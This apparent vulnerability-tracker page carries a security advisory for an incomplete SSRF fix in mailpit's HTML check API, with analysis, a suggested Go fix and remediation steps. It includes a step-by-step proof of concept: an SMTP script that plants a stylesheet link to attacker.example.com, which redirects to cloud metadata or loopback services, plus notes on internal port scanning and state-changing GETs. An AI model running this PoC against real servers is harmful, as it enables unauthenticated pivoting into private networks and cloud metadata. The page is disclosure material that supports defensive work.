mailpit CVE-2026-45709
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The fix for GHSA-6jxm-fv7w-rw5j (CVE-2026-23845, "Server-Side Request Forgery (SSRF) via HTML Check API"), shipped in mailpit v1.28.3, hardened internal/htmlcheck/css.go::downloadCSSToBytes with a 5MB size cap, a text/css content-type check, login-info stripping in isValidURL, and an opt-in --block-remote-css-and-fonts config flag - but did not add the IP-filtering dialer that the same codebase already uses on the two sister SSRF endpoints (the proxy handler and link-check). At HEAD 8bc966e61834a24c48b4465da418f75e73be0afd (2026-05-06), internal/htmlcheck/css.go::newSafeHTTPClient is mis-named - it builds an http.Client whose Transport.DialContext calls net.Dialer.DialContext directly with no IP allowlisting. As a result, the SSRF originally reported by Bao Anh Phan still permits the server to dial:
- loopback (
127.0.0.0/8,::1), - private (
10.0.0.0/8,172.16.0.0/12,192.168.0.0/16,fc00::/7), - link-local incl. cloud IMDS (
169.254.0.0/16, especially169.254.169.254), - CGNAT (
100.64.0.0/10), - and any other reserved/multicast range,
- provided the target replies with
HTTP/200and a content-type beginning withtext/css. With redirect-following (CheckRedirectallows redirects to anyisValidURLURL with no IP filter), an attacker-controlled public site can redirect mailpit's request into the private network without ever appearing in the email's HTML.
In the default mailpit deploy (no UI auth, no SMTP auth, port 1025/8025 exposed), this is an unauthenticated, network-reachable SSRF triggered by sending an HTML email and then issuing one HTTP GET to /api/v1/message/{id}/html-check.
Affected versions
internal/htmlcheck/css.goat HEAD8bc966e61834a24c48b4465da418f75e73be0afd(2026-05-06).- All versions
>= v1.28.3(the version that shipped the GHSA-6jxm fix). Versions<= v1.28.2are vulnerable to the original GHSA-6jxm; versions>= v1.28.3carry the still-vulnerable variant described here.
The incomplete fix
The original GHSA-6jxm fix added size+content-type+login-info hardening to downloadCSSToBytes. But the dialer it uses still has no safeDialContext. The companion linkcheck and proxy handlers in the same codebase have all-three protections: size cap, content-type/redirect filter, AND a safeDialContext that runs tools.IsInternalIP(ip.IP) per resolved address - same pattern the htmlcheck dialer should adopt.
Side-by-side at HEAD 8bc966e:
| File | Function | safeDialContext (IP filter)? | TOCTOU-safe (dial-by-IP)? |
|---|---|---|---|
internal/linkcheck/status.go::safeDialContext line 140-163 | dial check | YES | YES (resolved IP joined with port) |
server/handlers/proxy.go::safeDialContext line 393-415 | dial check | YES | YES |
internal/htmlcheck/css.go::newSafeHTTPClient line 275-310 | dial check | NO | n/a |
The mis-named newSafeHTTPClient reads:
// internal/htmlcheck/css.go:275-310
func newSafeHTTPClient() *http.Client {
dialer := &net.Dialer{
Timeout: 5 * time.Second,
KeepAlive: 30 * time.Second,
}
tr := &http.Transport{
Proxy: nil,
DialContext: func(ctx context.Context, network, address string) (net.Conn, error) {
return dialer.DialContext(ctx, network, address) // no IP filter
},
...
}
client := &http.Client{
Transport: tr,
Timeout: 15 * time.Second,
CheckRedirect: func(req *http.Request, via []*http.Request) error {
if len(via) >= 3 { return errors.New("too many redirects") }
if !isValidURL(req.URL.String()) { return errors.New("invalid redirect URL") }
return nil
},
}
return client
}isValidURL only rejects non-http(s) and userinfo URLs - it does NOT reject internal IPs. Compare linkcheck/status.go::safeDialContext:
ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
...
if !config.AllowInternalHTTPRequests {
for _, ip := range ips {
if tools.IsInternalIP(ip.IP) {
return nil, fmt.Errorf("blocked request to %s (%s): private/reserved address", host, ip)
}
}
}
return dialer.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))That's the protection htmlcheck is missing.
Reachability chain (default deploy)
Listen()
# config/config.go:36 SMTPListen = "[::]:1025"
↓
SMTP server
# internal/smtpd/main.go:222-249 AuthRequired: false, AuthHandler: nil
↓ attacker injects HTML body with <link rel="stylesheet" href="...attacker.com/redirect.css">
↓
storage.Store(...)
↓
Listen()
# server/server.go HTTPListen
↓ attacker sends GET /api/v1/message/{id}/html-check
apiv1.HTMLCheck
# server/apiv1/other.go:18
↓ no UI auth in default deploy (auth.UICredentials == nil)
htmlcheck.RunTests(msg.HTML)
# internal/htmlcheck/main.go:17
↓
runCSSTests → inlineRemoteCSS
# internal/htmlcheck/css.go:25, 132
↓
downloadCSSToBytes(href)
# internal/htmlcheck/css.go:192
↓
newSafeHTTPClient()
# internal/htmlcheck/css.go:275
↓ no IP filter on Transport.DialContext or CheckRedirect
client.Do(req) → attacker-controlled origin → 302 redirect to internal IP → successPoC
Default-deploy reproduction (no auth):
# 1) start mailpit with defaults (no --smtp-auth, no --ui-auth)
docker run -p 1025:1025 -p 8025:8025 axllent/mailpit:latest
# 2) attacker hosts a redirect to an internal target
# e.g., http://attacker.example.com/test.css → 302 → http://169.254.169.254/...
# 3) inject email via SMTP (no auth required)
python3 - <<'EOF'
import smtplib
from email.mime.text import MIMEText
html = '''<!DOCTYPE html><html><head>
<link rel="stylesheet" href="http://attacker.example.com/test.css">
</head><body>x</body></html>'''
m = MIMEText(html, 'html')
m['Subject'] = 'mailpit-001'
m['From'] = 'a@b'
m['To'] = 'c@d'
with smtplib.SMTP('localhost', 1025) as s:
s.send_message(m)
EOF
# 4) get the message ID
ID=$(curl -s http://localhost:8025/api/v1/messages?limit=1 | jq -r '.messages[0].ID')
# 5) trigger the SSRF with one anonymous GET
curl -i http://localhost:8025/api/v1/message/$ID/html-checkThe HTTP server-side dial follows http://attacker.example.com/test.css → 302 redirect to http://127.0.0.1:6379/ → mailpit completes a TCP connect to the loopback Redis. No request body is reflected to the attacker (mailpit only inlines successful 200 + text/css responses), but:
- State-changing internal GETs. Any internal admin app served on
127.0.0.1or RFC1918 with a "GET /admin/restart", "GET /vacuum", "GET /flush" pattern can be triggered through this primitive. Several common stacks (Spring Actuator, etcd debug, internal Prometheus admin, Redis HTTP front-ends, Jaeger UI) expose such operations on private ports. - Cloud-IMDS reachability oracle. Because IMDS responses don't carry
text/css, the body is not inlined - but the redirect chain DOES dial 169.254.169.254. A side-channel (response time, DNS log) can confirm IMDS reachability from a default-deploy mailpit on cloud. - Internal port-scan via timing. The 5s+15s timeouts produce a clear timing differential between "RST refused" (~ms), "open and HTTP-noisy" (~10ms+), and "filtered" (multi-second).
- Authenticated
Mailpit/<version>GET. Every internal target sees a known UA from a trusted internal subnet; combined with redirect-stripping, this can fool internal allowlists keyed on UA.
Threat model alignment
The maintainer's prior position on the SSRF class is captured by GHSA-6jxm-fv7w-rw5j (HTML Check, Medium), GHSA-mpf7-p9x7-96r3 (Link Check, Medium), and GHSA-8v65-47jx-7mfr (Proxy Endpoint, Medium). All three are siblings in the same SSRF class, and the maintainer chose to remediate each via a safeDialContext-style filter in the linkcheck and proxy fixes. The htmlcheck fix is the outlier: same class, same severity, but the IP filter was not applied. The remaining surface is therefore a regression of the published fix's stated goal ("disallow internal targets").
Default-deploy reachability is unauthenticated (per the maintainer's own README, mailpit is intended to run without auth in dev/CI). With UI auth configured, the same primitive is post-auth - still useful (UI-auth mailpit deployments often live on the internal/ops subnet, exposing other ops services).
Suggested fix
Make newSafeHTTPClient use the same safeDialContext pattern already proven in linkcheck/status.go and server/handlers/proxy.go. Concretely:
// internal/htmlcheck/css.go
func newSafeHTTPClient() *http.Client {
dialer := &net.Dialer{
Timeout: 5 * time.Second,
KeepAlive: 30 * time.Second,
}
tr := &http.Transport{
Proxy: nil,
DialContext: safeDialContext(dialer), // ← add IP filter
TLSHandshakeTimeout: 5 * time.Second,
ResponseHeaderTimeout: 10 * time.Second,
ExpectContinueTimeout: 1 * time.Second,
IdleConnTimeout: 30 * time.Second,
MaxIdleConns: 50,
}
client := &http.Client{
Transport: tr,
Timeout: 15 * time.Second,
CheckRedirect: func(req *http.Request, via []*http.Request) error {
if len(via) >= 3 {
return errors.New("too many redirects")
}
if !isValidURL(req.URL.String()) {
return errors.New("invalid redirect URL")
}
// safeDialContext re-runs IP filter on each hop's Dial,
// so redirect target IP is also enforced.
return nil
},
}
return client
}
// safeDialContext is the same pattern as linkcheck/status.go::safeDialContext
// - copy the function (or factor a shared helper into internal/tools/net.go).
func safeDialContext(dialer *net.Dialer) func(ctx context.Context, network, address string) (net.Conn, error) {
return func(ctx context.Context, network, address string) (net.Conn, error) {
host, port, err := net.SplitHostPort(address)
if err != nil { return nil, err }
ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
if err != nil { return nil, err }
if !config.AllowInternalHTTPRequests {
for _, ip := range ips {
if tools.IsInternalIP(ip.IP) {
return nil, fmt.Errorf("blocked request to %s (%s): private/reserved address", host, ip)
}
}
}
return dialer.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))
}
}Two further hardening notes:
- Add CGNAT 100.64.0.0/10 (RFC 6598).
tools.IsInternalIPcovers loopback, private, link-local, multicast, unspecified - but not CGNAT. This affects all three SSRF dialers (htmlcheck, linkcheck, proxy). Tailscale tailnets and GCP IAP fall in100.64.0.0/10; an mailpit instance running on a Tailscale node can be used to pivot into the tailnet. Concrete fix: extendtools.IsInternalIPwithcgnat := net.IPNet{IP: net.IPv4(100, 64, 0, 0), Mask: net.CIDRMask(10, 32)}; if cgnat.Contains(ip) { return true }. - Re-validate the rename.
newSafeHTTPClientis a misleading name today - once the dialer is hardened, the name will be accurate. Until then, consider renaming it tonewHTTPClientto remove the false sense of safety it conveys to maintainers reading the file.
Reproduction environment
- Tested against: HEAD
8bc966e61834a24c48b4465da418f75e73be0afd(2026-05-06). - Code locations:
- Vulnerable dialer:
internal/htmlcheck/css.go:275-310 - Vulnerable downloader:
internal/htmlcheck/css.go:192-229 - Reachability gate:
internal/htmlcheck/css.go:131-187(inlineRemoteCSS) - Trigger handler:
server/apiv1/other.go:18-79(HTMLCheck) - Default no-UI-auth:
internal/auth/auth.go+ middleware inserver/server.go:317 - Default no-SMTP-auth:
internal/smtpd/main.go:229-230 - Sister fixed dialers (for diff):
internal/linkcheck/status.go:140-163,server/handlers/proxy.go:393-415
Reporter
Eddie Ran. Filed via reporter API.
AnalysisAI
Incomplete SSRF remediation in mailpit's HTML check endpoint (>= v1.28.3, < v1.30.0) leaves internal/htmlcheck/css.go::newSafeHTTPClient without the IP-filtering dialer that sibling endpoints already employ, allowing the server to dial loopback, RFC1918, cloud IMDS (169.254.169.254), CGNAT, and multicast ranges. On default mailpit deployments - where SMTP auth and UI auth are both disabled - unauthenticated network-reachable attackers can trigger this by injecting one HTML email and issuing a single GET to /api/v1/message/{id}/html-check, making this a zero-credential pivot primitive into internal infrastructure. Publicly available exploit code exists; no confirmed active exploitation in CISA KEV at time of analysis.
Technical ContextAI
mailpit is a Go-based email testing tool (pkg:go/github.com/axllent/mailpit, CPE confirmed). The root cause is CWE-918 (Server-Side Request Forgery): the newSafeHTTPClient function in internal/htmlcheck/css.go (lines 275-310 at HEAD 8bc966e) builds an http.Client whose Transport.DialContext invokes net.Dialer.DialContext directly without calling tools.IsInternalIP per resolved address. The isValidURL helper only rejects non-HTTP(S) schemes and userinfo-bearing URLs; it does not block private (RFC1918), loopback, link-local, CGNAT (RFC6598 100.64.0.0/10), or multicast addresses. The CheckRedirect handler similarly accepts any URL passing isValidURL, enabling an attacker-controlled public origin to issue a 302 redirect into the private network after mailpit has already left the public internet. Sibling endpoints internal/linkcheck/status.go::safeDialContext (lines 140-163) and server/handlers/proxy.go::safeDialContext (lines 393-415) both resolve hostnames, call tools.IsInternalIP per resolved IP, and then dial by resolved IP (making them TOCTOU-safe); htmlcheck is the sole outlier. This vulnerability is a regression of the stated remediation goal of GHSA-6jxm-fv7w-rw5j (CVE-2026-23845), which shipped the partial fix in v1.28.3.
RemediationAI
Upgrade to mailpit v1.30.0, which is the vendor-released patch confirmed by package metadata (pkg:go/github.com/axllent/mailpit, fixed: 1.30.0). The fix requires adding a safeDialContext IP-filtering wrapper to internal/htmlcheck/css.go::newSafeHTTPClient that calls tools.IsInternalIP per resolved address and dials by resolved IP, matching the existing pattern in internal/linkcheck/status.go and server/handlers/proxy.go. If immediate upgrade is not possible, enable the --block-remote-css-and-fonts configuration flag (available since v1.28.3); this suppresses all remote CSS fetches entirely, fully eliminating the vulnerable code path at the cost of disabling CSS inlining in HTML check output. On cloud deployments, additionally restrict inbound access to ports 1025 (SMTP) and 8025 (HTTP API) via security groups or host firewall rules to limit the attacker's ability to inject emails and invoke the check endpoint from untrusted networks - this does not fix the SSRF but reduces the reachable attacker population. Note that tools.IsInternalIP does not currently cover CGNAT range 100.64.0.0/10 (RFC6598); even after upgrading, Tailscale or GCP IAP-based internal networks in that range may remain reachable until tools.IsInternalIP is extended. Vendor advisory: https://github.com/axllent/mailpit/security/advisories/GHSA-j3fj-qppj-fmmc.
Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m
Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti
Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent
Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug
JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up
Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up
The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow
Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla
The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-j3fj-qppj-fmmc